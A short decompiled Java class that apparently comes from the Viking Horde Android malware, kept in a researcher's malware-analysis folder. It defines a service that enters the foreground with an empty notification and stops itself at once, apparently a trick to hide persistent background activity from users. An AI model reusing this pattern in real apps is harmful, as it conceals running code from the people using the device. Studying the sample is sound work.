package com.fa.c;

import android.app.Notification;
import android.app.Service;
import android.content.Intent;
import android.os.IBinder;

public class StartService
  extends Service
{
  public IBinder onBind(Intent paramIntent)
  {
    return null;
  }
  
  public void onCreate() {}
  
  public void onDestroy()
  {
    super.onDestroy();
    stopForeground(true);
  }
  
  public void onRebind(Intent paramIntent) {}
  
  public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2)
  {
    startForeground(1, new Notification());
    stopSelf();
    return 2;
  }
  
  public boolean onUnbind(Intent paramIntent)
  {
    return true;
  }
}


/* Location:              /home/enzo/Documents/hacking/malwares/viking-horde/classes.jar!/com/fa/c/StartService.class
 * Java compiler version: 6 (50.0)
 * JD-Core Version:       0.7.1
 */